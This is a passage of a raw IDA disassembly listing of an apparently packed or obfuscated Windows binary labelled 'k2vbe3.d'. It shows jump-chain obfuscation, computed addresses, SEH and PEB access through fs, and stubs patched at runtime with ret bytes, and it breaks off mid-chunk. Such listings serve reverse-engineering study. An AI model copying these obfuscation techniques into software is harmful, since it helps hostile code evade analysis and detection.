		lea	eax, nullsub_116
		jmp	loc_450777
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CCB3

loc_43F445:				; CODE XREF: sub_43CCB3:loc_44B241j
		mov	[ebp-8], eax
		mov	eax, [ebp+8]
		test	byte ptr [eax-8], 80h
		jz	loc_45A345
		jmp	loc_43DDD9
; END OF FUNCTION CHUNK	FOR sub_43CCB3
; ---------------------------------------------------------------------------
		push	ecx
		push	0D6A18F2h
		pop	ecx
		sub	ecx, 0B1A05DF6h
		add	ecx, 0A4782524h
		mov	[ecx], eax
		pop	ecx
		lea	eax, loc_457048
		jmp	loc_455A8D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443EF6

loc_43F47B:				; CODE XREF: sub_443EF6:loc_448768j
					; sub_443EF6+10B2Dj
		push	eax
		push	73C57183h
		pop	eax
		add	eax, 6494F8Eh
		sub	eax, 620DBDA4h
		cmp	eax, 0BB8E54FDh
		jmp	loc_447B89
; END OF FUNCTION CHUNK	FOR sub_443EF6
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_167. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450F71

loc_43F49A:				; CODE XREF: sub_450F71-4363j
		jmp	loc_440ED2
; END OF FUNCTION CHUNK	FOR sub_450F71
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444B3E

loc_43F49F:				; CODE XREF: sub_444B3E-26E5j
		jmp	loc_44734A
; END OF FUNCTION CHUNK	FOR sub_444B3E
; ---------------------------------------------------------------------------

locret_43F4A4:				; CODE XREF: k2vbe3.d:00444387j
		retn
; ---------------------------------------------------------------------------
		sub	eax, ds:dword_453D04
		shr	eax, 11h
		jz	loc_43D583
		jmp	loc_440095
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BDBB

loc_43F4B9:				; CODE XREF: sub_44BDBB-EEA5j
		xchg	esi, [esp+0]
		jmp	sub_451759
; END OF FUNCTION CHUNK	FOR sub_44BDBB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4424CF

loc_43F4C1:				; CODE XREF: sub_4424CF:loc_4518C9j
		pop	edi
		or	edi, ds:4000F2h
		xor	edi, 8B09C3F5h
		jnz	loc_44CFC7
; END OF FUNCTION CHUNK	FOR sub_4424CF
; START	OF FUNCTION CHUNK FOR sub_447692

loc_43F4D4:				; CODE XREF: sub_447692+645Fj
		jmp	loc_43CB45
; END OF FUNCTION CHUNK	FOR sub_447692
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D9A7

loc_43F4D9:				; CODE XREF: sub_44D9A7:loc_455526j
		pushf
		push	0FEFBF6B9h
		pop	edx
		rol	edx, 3
		and	edx, 0D359A05h
		jmp	loc_44100A
; END OF FUNCTION CHUNK	FOR sub_44D9A7
; ---------------------------------------------------------------------------

loc_43F4EE:				; DATA XREF: sub_44A9FFo
		call	nullsub_4
		jmp	ds:dword_41E178
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A6BD

loc_43F4F9:				; CODE XREF: sub_44A6BD+8j
		jmp	loc_43DF2F
; END OF FUNCTION CHUNK	FOR sub_44A6BD
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_4. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
		cmp	al, 24h
		mov	edx, edi
		pop	edi
		jmp	loc_45184B
; ---------------------------------------------------------------------------
		xor	eax, ebp
		adc	edi, 2595F7AFh
		pop	ebp
; START	OF FUNCTION CHUNK FOR sub_440C94

loc_43F512:				; CODE XREF: sub_440C94:loc_44EF65j
		test	edx, edi
		jmp	loc_442B24
; END OF FUNCTION CHUNK	FOR sub_440C94
; ---------------------------------------------------------------------------

loc_43F519:				; CODE XREF: k2vbe3.d:00453ABDj
		jo	loc_447E8B
; START	OF FUNCTION CHUNK FOR sub_44600A

loc_43F51F:				; CODE XREF: sub_44600A:loc_44EE4Aj
		or	esi, ds:4000ECh
		add	esi, 2964F6A3h
		xchg	esi, [esp+0]
		jmp	loc_44994D
; END OF FUNCTION CHUNK	FOR sub_44600A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444297

loc_43F533:				; CODE XREF: sub_444297+16477j
		call	sub_44C1BD
		cmp	dword ptr [ebp-0Ch], 0
		jz	loc_442405
		jmp	loc_4536BB
; END OF FUNCTION CHUNK	FOR sub_444297
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E135

loc_43F547:				; CODE XREF: sub_43E135:loc_450377j
		add	edx, 3AC6ADFh
		add	edx, ebp
		add	edx, 73D39108h
		mov	edx, [edx]
		imul	byte ptr [edx]
		jmp	loc_43C580
; END OF FUNCTION CHUNK	FOR sub_43E135
; ---------------------------------------------------------------------------
		adc	eax, esi
		jmp	sub_44F42B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A641

loc_43F565:				; CODE XREF: k2vbe3.d:0043EC97j
					; sub_44A641+12j
		rol	eax, 0Bh
		sub	eax, 2A258940h
		rol	eax, 1
		add	eax, 22DAD61Fh
		mov	eax, [eax]
		mov	[eax], ebx
		mov	eax, offset dword_441770
		jmp	loc_45B94F
; END OF FUNCTION CHUNK	FOR sub_44A641
; ---------------------------------------------------------------------------

loc_43F584:				; CODE XREF: k2vbe3.d:loc_45BE17j
		push	offset sub_4431F0
		jmp	loc_4411A5
; ---------------------------------------------------------------------------

loc_43F58E:				; CODE XREF: k2vbe3.d:0043ED33j
		xchg	eax, [esp]
		pop	eax
		mov	eax, [esp]
		push	eax
		jmp	loc_440EFE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45512F

loc_43F59B:				; CODE XREF: sub_45512F-CB87j
		js	loc_43CCA0
		cmp	ebp, 0F05D8EDDh
		jmp	loc_4436FC
; END OF FUNCTION CHUNK	FOR sub_45512F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443FAC

loc_43F5AC:				; CODE XREF: sub_443FAC:loc_441404j
		mov	edx, ebx
		xchg	edx, [esp+0]
		mov	ebx, eax
		xchg	ebx, [esp+0]
		ror	eax, 19h
		push	ecx
		jmp	loc_43E8B3
; END OF FUNCTION CHUNK	FOR sub_443FAC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E204

loc_43F5BF:				; CODE XREF: sub_43E204:loc_43C3C4j
		mov	[ecx+0B8h], eax
		push	offset loc_443D45
		jmp	loc_44839B
; END OF FUNCTION CHUNK	FOR sub_43E204
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4499EC

loc_43F5CF:				; CODE XREF: sub_4499EC:loc_451080j
		xor	edi, 9CDBB2EBh
		rol	edi, 0Eh
		add	edi, 3D1E6553h
		xchg	edi, [esp+0]
		jmp	loc_4410C5
; END OF FUNCTION CHUNK	FOR sub_4499EC

; =============== S U B	R O U T	I N E =======================================



sub_43F5E6	proc near		; DATA XREF: sub_4460FD:loc_440748o
		mov	eax, [esp+0]
		call	sub_43DA01
sub_43F5E6	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_44FF97

loc_43F5EE:				; CODE XREF: sub_44FF97:loc_451209j
					; k2vbe3.d:004545F5j
		xchg	eax, [esp+0]
		mov	edx, eax
		push	eax
		push	92CEC99Eh
		sbb	eax, 456D8024h
		jmp	loc_452A1A
; END OF FUNCTION CHUNK	FOR sub_44FF97
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_430. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		mov	ebp, 17FA40E9h
		jmp	sub_4478F3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445124

loc_43F60F:				; CODE XREF: sub_445124-3A78j
		push	28h
		mov	eax, [ebp-4]
		push	esi
		mov	esi, eax
		xchg	esi, [esp+0]
		call	sub_45BDE4
		mov	eax, [ebp-4]
		jmp	loc_43DAB8
; END OF FUNCTION CHUNK	FOR sub_445124
; ---------------------------------------------------------------------------

loc_43F627:				; CODE XREF: k2vbe3.d:0045029Fj
		sub	ebp, 3DCE14D0h

loc_43F62D:				; CODE XREF: k2vbe3.d:loc_45028Cj
		rol	esi, 9
		or	esi, 7B8AFA55h
		and	esi, 650161A6h
		add	esi, 9B417E9Ch
		mov	[esi], eax
		jmp	loc_43FD17
; ---------------------------------------------------------------------------
		jmp	ds:dword_41E144
; ---------------------------------------------------------------------------

loc_43F64F:				; CODE XREF: k2vbe3.d:0044C449j
		jmp	locret_440062
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_467. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		xor	byte ptr [ebx-3Eh], 1
		add	[edi-2C74DBE4h], al
		jmp	loc_4531B3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B69B

loc_43F664:				; CODE XREF: sub_45B69B+6j
		push	offset loc_4403EC
		jmp	nullsub_428
; END OF FUNCTION CHUNK	FOR sub_45B69B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B979

loc_43F66E:				; CODE XREF: sub_44B979:loc_455020j
		push	44B4532Fh
		pop	edi
		rol	edi, 11h
		add	edi, 59E5C6C6h
		xchg	edi, [esp+814h+var_814]
		jmp	sub_4436CE
; END OF FUNCTION CHUNK	FOR sub_44B979
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452092

loc_43F685:				; CODE XREF: sub_452092+3E46j
		xchg	ebx, [esp+0]
		jmp	loc_44A86E
; END OF FUNCTION CHUNK	FOR sub_452092
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443F0D

loc_43F68D:				; CODE XREF: sub_443F0D:loc_44CB3Dj
		mov	eax, [esp+20h+var_20]
		push	edx
		call	sub_442D04
		push	4252A7D6h
		pop	eax
		rol	eax, 1Bh
		jmp	loc_45C121
; END OF FUNCTION CHUNK	FOR sub_443F0D
; ---------------------------------------------------------------------------
		sbb	ebx, 5F4D8D23h
		jmp	sub_442675
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448B5E

loc_43F6AF:				; CODE XREF: sub_448B5E+1085Aj
		mov	eax, [esp+0]
		push	edx
		push	ecx
		push	2FC0B86Eh
		pop	ecx
		and	ecx, 5B08612Eh
		cmp	ecx, 2F5EB22Bh
		jmp	loc_446694
; END OF FUNCTION CHUNK	FOR sub_448B5E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DFE1

loc_43F6CB:				; CODE XREF: sub_43DFE1+E127j
		or	ebx, 0D6B8625Ah
		add	ebx, 288C60A5h
		mov	[ebx], eax
		pop	ebx

loc_43F6DA:				; CODE XREF: sub_442C22+Cj
					; sub_4506C3-15C3j
		ror	eax, 1Eh
		push	edi
		jmp	loc_44103A
; END OF FUNCTION CHUNK	FOR sub_43DFE1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450F71

loc_43F6E3:				; CODE XREF: sub_450F71-94D5j
		pop	eax
		or	eax, 362B8A88h

loc_43F6EA:				; CODE XREF: k2vbe3.d:loc_44BAB5j
		add	eax, 2CB6A40Ch
		add	eax, ebp
		push	esi
		push	399844BEh
		jmp	loc_4481A3
; END OF FUNCTION CHUNK	FOR sub_450F71
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B4EE

loc_43F6FD:				; CODE XREF: sub_45B4EE-1E5FAj
		adc	edi, eax
; END OF FUNCTION CHUNK	FOR sub_45B4EE
; START	OF FUNCTION CHUNK FOR sub_44866A

loc_43F6FF:				; CODE XREF: sub_45B4EE:loc_442D0Aj
					; sub_44866A+7j ...
		jmp	loc_4445B5
; END OF FUNCTION CHUNK	FOR sub_44866A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EEC6

loc_43F704:				; CODE XREF: k2vbe3.d:00451934j
					; sub_43EEC6+19670j
		pop	ecx
		xchg	eax, [esp+8+var_8]
		jmp	loc_449A28
; END OF FUNCTION CHUNK	FOR sub_43EEC6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449DA2

loc_43F70D:				; CODE XREF: sub_449DA2:loc_45B6A7j
		pop	ebx
		add	ebx, 68C663D1h
		cmp	ebx, 549FAE86h
		jmp	loc_440186
; END OF FUNCTION CHUNK	FOR sub_449DA2
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_323. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_43F720:				; CODE XREF: k2vbe3.d:0045B1D9j
		jmp	loc_457E03
; ---------------------------------------------------------------------------

loc_43F725:				; CODE XREF: k2vbe3.d:loc_45690Aj
		rol	ebx, 1Fh
		jmp	sub_44F817
; ---------------------------------------------------------------------------

loc_43F72D:				; DATA XREF: sub_4426DF+4AF3o
		or	eax, eax
		jnz	loc_43DB5A
		jmp	loc_452049
; ---------------------------------------------------------------------------

loc_43F73A:				; CODE XREF: k2vbe3.d:0044956Ej
		push	ebx

; =============== S U B	R O U T	I N E =======================================



sub_43F73B	proc near		; CODE XREF: sub_443F0D+8C3p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0045177A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451B34 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 004581C0 SIZE 00000017 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		call	sub_459DA3
		xchg	ecx, [esp-4+arg_0]
		mov	edx, ecx
		pop	ecx
		push	eax
		jmp	loc_45177A
sub_43F73B	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_43F750:				; CODE XREF: sub_44C90E:loc_443317j
		mov	ebp, edx
		push	offset loc_454162
		jmp	loc_44A765
; END OF FUNCTION CHUNK	FOR sub_44C90E

; =============== S U B	R O U T	I N E =======================================



sub_43F75C	proc near		; CODE XREF: k2vbe3.d:00448848j
					; sub_43FB73+E07Fp

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 0044215D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448971 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0045382B SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		call	eax
		mov	[ebp-4], eax

loc_43F765:				; CODE XREF: sub_44D16B-1201j
					; k2vbe3.d:00450C60j ...
		dec	ds:dword_44BCF8
		mov	eax, [ebp-4]
		xchg	esi, [esp-4+arg_0]
		and	ecx, ebx

loc_43F773:				; CODE XREF: sub_44E971:loc_43D856j
		jmp	loc_44215D
sub_43F75C	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_43F778:				; CODE XREF: k2vbe3.d:00444124j
		jnb	loc_451091
		pop	ebx

; =============== S U B	R O U T	I N E =======================================



sub_43F77F	proc near		; CODE XREF: k2vbe3.d:004460DBp

; FUNCTION CHUNK AT 004573C5 SIZE 0000000B BYTES

		xchg	eax, [esp+0]
		pop	eax
		jmp	loc_4573C5
sub_43F77F	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449372

loc_43F788:				; CODE XREF: sub_449372-789j
		or	eax, 333478BCh

loc_43F78E:				; CODE XREF: sub_449372:loc_45902Aj
		push	ecx
		push	94DB280Bh
		pop	ecx
		sub	ecx, 0A9747046h
		jmp	loc_44B259
; END OF FUNCTION CHUNK	FOR sub_449372
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440F92

loc_43F7A0:				; CODE XREF: sub_440F92+1166Bj
		sub	edi, eax

loc_43F7A2:				; CODE XREF: k2vbe3.d:loc_4430F1j
		push	offset loc_44B2A7
		jmp	loc_445114
; END OF FUNCTION CHUNK	FOR sub_440F92

; =============== S U B	R O U T	I N E =======================================



sub_43F7AC	proc near		; CODE XREF: sub_43E204p

var_C		= dword	ptr -0Ch

; FUNCTION CHUNK AT 0043D1A8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043D99E SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0043DDF6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043E4BD SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043E9C5 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044245E SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00442BA5 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00443AC3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443ACD SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00445F3E SIZE 00000025 BYTES
; FUNCTION CHUNK AT 0044719B SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00448CBC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B03F SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044BBAA SIZE 00000024 BYTES
; FUNCTION CHUNK AT 0044BE1A SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044C4B4 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044E3CB SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0044F635 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00450136 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00451175 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0045136C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004519C9 SIZE 00000025 BYTES
; FUNCTION CHUNK AT 00452AC8 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00453C0A SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00453E55 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 004543A9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454CD4 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 004550AA SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0045590F SIZE 00000016 BYTES
; FUNCTION CHUNK AT 004568D4 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 004570D2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00458373 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458A72 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00458B4B SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0045956F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045AF4F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045B358 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045BF41 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045C26F SIZE 0000000B BYTES

		push	large dword ptr	fs:0
		mov	large fs:0, esp
		mov	eax, large fs:30h
		push	edx
		jmp	loc_458A72
sub_43F7AC	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454234

loc_43F7C7:				; CODE XREF: sub_454234-C488j
		jnz	loc_45159A
		call	sub_4436CE
		mov	edx, 0B9726E5Ah
		call	sub_45B20A
		push	eax
; END OF FUNCTION CHUNK	FOR sub_454234
; START	OF FUNCTION CHUNK FOR sub_454225

loc_43F7DD:				; CODE XREF: sub_454225+Aj
		ror	eax, 11h
		mov	ds:dword_444F1C, eax
		retn
; END OF FUNCTION CHUNK	FOR sub_454225
; ---------------------------------------------------------------------------

loc_43F7E7:				; CODE XREF: k2vbe3.d:0044F812j
		jb	loc_44095B
; START	OF FUNCTION CHUNK FOR sub_43EFC9

loc_43F7ED:				; CODE XREF: sub_43EFC9+13FB4j
		add	eax, 3E806E9Dh
		mov	eax, [eax]
		call	sub_443EF6

loc_43F7FA:				; CODE XREF: k2vbe3.d:00449F6Cj
		jmp	sub_43C04E
; END OF FUNCTION CHUNK	FOR sub_43EFC9
; ---------------------------------------------------------------------------

loc_43F7FF:				; CODE XREF: k2vbe3.d:00446372j
		jmp	loc_44E94F
; ---------------------------------------------------------------------------

locret_43F804:				; CODE XREF: k2vbe3.d:loc_447D7Bj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_43F805:				; CODE XREF: sub_45A323+77j
		jns	loc_44257A
		not	eax

loc_43F80D:				; CODE XREF: sub_45A323+4Ej
		add	ebx, 4BAD30CAh
		xchg	ebx, [esp+4+var_4]
		jmp	loc_452741
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CF62

loc_43F81B:				; CODE XREF: sub_43CF62+10746j
		pop	ebx
		pop	edx
		xchg	ecx, [esp-0Ch+arg_8]
		mov	ebx, ecx
		pop	ecx
		xchg	ebx, [esp-10h+arg_C]
		mov	eax, ebx
		pop	ebx
		jmp	loc_45B42B
; END OF FUNCTION CHUNK	FOR sub_43CF62
; ---------------------------------------------------------------------------

loc_43F82E:				; CODE XREF: k2vbe3.d:0044FDA7j
		call	sub_455895
; START	OF FUNCTION CHUNK FOR sub_44D0D5

loc_43F833:				; CODE XREF: sub_44D0D5:loc_44E344j
		jnz	loc_44E7FA

loc_43F839:				; CODE XREF: sub_448A7D+9034j
		jmp	nullsub_194
; END OF FUNCTION CHUNK	FOR sub_44D0D5
; ---------------------------------------------------------------------------
		not	ecx
		sub	esi, 782DD417h
		jmp	loc_44E7FA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CE6C

loc_43F84B:				; CODE XREF: sub_44CE6C-93F9j
		add	eax, 8F459E52h

loc_43F851:				; CODE XREF: sub_44CE6C:loc_443A58j
		or	ecx, 0F12F33A4h
		add	ecx, 0ED6831Dh
; END OF FUNCTION CHUNK	FOR sub_44CE6C
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_43F85D:				; CODE XREF: sub_44C90E:loc_456BA2j
		xchg	ecx, [esp+0]
		jmp	loc_44F650
; END OF FUNCTION CHUNK	FOR sub_44C90E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447585

loc_43F865:				; CODE XREF: sub_447585+832Dj
		xor	eax, eax
		retn
; END OF FUNCTION CHUNK	FOR sub_447585
; ---------------------------------------------------------------------------

loc_43F868:				; DATA XREF: sub_447585+8320o
		xor	eax, eax
; START	OF FUNCTION CHUNK FOR sub_4517D6

loc_43F86A:				; CODE XREF: sub_4517D6:loc_45126Bj
		pop	large dword ptr	fs:0
		jmp	loc_450154
; END OF FUNCTION CHUNK	FOR sub_4517D6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D7A9

loc_43F876:				; CODE XREF: sub_43D7A9+10948j
		call	sub_454CAC
		test	eax, eax
		jz	loc_45B529
		jmp	loc_440AAF
; END OF FUNCTION CHUNK	FOR sub_43D7A9

; =============== S U B	R O U T	I N E =======================================



sub_43F888	proc near		; DATA XREF: k2vbe3.d:00459CFFo
		add	eax, 0C38DA2C1h
		add	eax, ebp
		add	eax, 3C701747h
		mov	eax, [eax]
		popf
		push	offset loc_44AAB2
		jmp	nullsub_531
sub_43F888	endp

; ---------------------------------------------------------------------------

loc_43F8A3:				; CODE XREF: k2vbe3.d:00454776j
		jz	loc_4560B9
		jmp	loc_4558C5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D59D

loc_43F8AE:				; CODE XREF: sub_44D59D:loc_4530A2j
		mov	esi, 76D6ABD2h
		jmp	loc_444DCA
; END OF FUNCTION CHUNK	FOR sub_44D59D

; =============== S U B	R O U T	I N E =======================================



sub_43F8B8	proc near		; DATA XREF: sub_44DD31:loc_45A9C5o

var_4		= dword	ptr -4

		push	edi
		push	920FA2FBh
		pop	edi
		and	edi, 61E9972Ah
		add	edi, 3A4B4Ah
		xchg	edi, [esp+4+var_4]
		jmp	sub_43DA01
sub_43F8B8	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_43F8D3:				; CODE XREF: sub_44C90E:loc_443311j
					; k2vbe3.d:00443325j
		add	ebx, 1CEF4FBEh
		add	eax, ebx
		pop	ebx
		mov	eax, [eax]
; END OF FUNCTION CHUNK	FOR sub_44C90E
; START	OF FUNCTION CHUNK FOR sub_44A679

loc_43F8DE:				; CODE XREF: sub_44A679:loc_4520FFj
		push	eax
		call	sub_43CC89
		push	offset loc_451BE2
		jmp	nullsub_123
; END OF FUNCTION CHUNK	FOR sub_44A679
; ---------------------------------------------------------------------------

loc_43F8EE:				; CODE XREF: k2vbe3.d:loc_445556j
		push	edx
		call	sub_44E481
		mov	eax, 0B2EE4EE4h
		call	sub_4553CC
		mov	ds:dword_41E0C0, eax
		lea	eax, nullsub_479
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_479
; ---------------------------------------------------------------------------
		mov	ds:dword_41E190, eax
		lea	eax, nullsub_498
		mov	byte ptr [eax],	0C3h
		jmp	loc_451795
; ---------------------------------------------------------------------------
		call	nullsub_116
		jmp	ds:dword_41E194
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B20A

loc_43F931:				; CODE XREF: sub_45B20A-11A9Bj
		jmp	loc_44C834
; END OF FUNCTION CHUNK	FOR sub_45B20A
; ---------------------------------------------------------------------------
		popf
		jmp	sub_44600A
; ---------------------------------------------------------------------------

loc_43F93C:				; CODE XREF: k2vbe3.d:loc_45216Aj
					; k2vbe3.d:00452184j
		add	eax, 0D5587F9Ah
		xchg	eax, [esp]
		jmp	loc_44DA3C
; ---------------------------------------------------------------------------
		push	636294F0h
		pop	eax
		sub	eax, 0E0FDF390h
		test	eax, 1
		jmp	loc_44DA30
; ---------------------------------------------------------------------------

loc_43F961:				; DATA XREF: k2vbe3.d:00448457o
		add	eax, edx
		pop	edx

loc_43F964:				; CODE XREF: k2vbe3.d:0044303Bj
		push	eax
		push	0
		call	sub_448343
		jmp	loc_4546D6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44FF97

loc_43F971:				; CODE XREF: sub_44FF97:loc_456BBFj
		pop	ebx
		rol	ebx, 1Fh
		add	ebx, 9D1ADF40h
		xchg	ebx, [esp+4+var_4]
		jmp	loc_44CF7A
; END OF FUNCTION CHUNK	FOR sub_44FF97
; ---------------------------------------------------------------------------

loc_43F983:				; CODE XREF: k2vbe3.d:0045AF93j
		mov	ebp, [esi]

loc_43F985:				; CODE XREF: k2vbe3.d:0045AF87j
		sub	eax, 0AAD6095h
		or	eax, 1BB4C80Eh
		xor	eax, 93F34CD1h
		add	eax, ebp
		add	eax, 0F7B37A32h
; START	OF FUNCTION CHUNK FOR sub_43D823

loc_43F99F:				; CODE XREF: sub_43D823+6E04j
		jmp	loc_4554D2
; END OF FUNCTION CHUNK	FOR sub_43D823
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455B26

loc_43F9A4:				; CODE XREF: sub_455B26-16AAEj
		push	edi
		mov	edi, eax
		xchg	edi, [esp+10h+var_10]
		lea	eax, sub_441D41
		jmp	loc_44BFE8
; END OF FUNCTION CHUNK	FOR sub_455B26
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F2E0

loc_43F9B5:				; CODE XREF: sub_43F2E0:loc_441600j
		and	eax, 78CA25DCh
		xor	eax, 252B841Ah
		jnz	loc_45484A
		jz	loc_43C088
		jmp	loc_454845
; END OF FUNCTION CHUNK	FOR sub_43F2E0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_466. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450B82

loc_43F9D3:				; CODE XREF: sub_450B82+4A4Dj
		jmp	sub_4553CC
; END OF FUNCTION CHUNK	FOR sub_450B82
; ---------------------------------------------------------------------------

loc_43F9D8:				; CODE XREF: k2vbe3.d:0044B8D6j
		jmp	loc_45A85E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_317. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_43F9DE:				; CODE XREF: k2vbe3.d:00444E33j
		jmp	loc_4558B8
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_362. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458658

loc_43F9E4:				; CODE XREF: sub_458658+5j
		jmp	loc_44FDA1
; END OF FUNCTION CHUNK	FOR sub_458658
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449312

loc_43F9E9:				; CODE XREF: sub_449312+Bj
		jmp	loc_43C513
; END OF FUNCTION CHUNK	FOR sub_449312
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_254. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4488D6

loc_43F9EF:				; CODE XREF: sub_4488D6+1j
		mov	ebx, eax
		xchg	ebx, [esp+4+var_4]
		push	3178123Fh
		pop	eax
		xor	eax, 95F3F934h
		sub	eax, 9244A270h
		or	eax, 466CA109h
		jns	loc_448FAF

loc_43FA12:				; CODE XREF: sub_45825C+18j
		jmp	nullsub_263
; END OF FUNCTION CHUNK	FOR sub_4488D6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4471DC

loc_43FA17:				; CODE XREF: sub_4471DC-5E56j
		jmp	nullsub_529
; END OF FUNCTION CHUNK	FOR sub_4471DC
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_218. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45482D

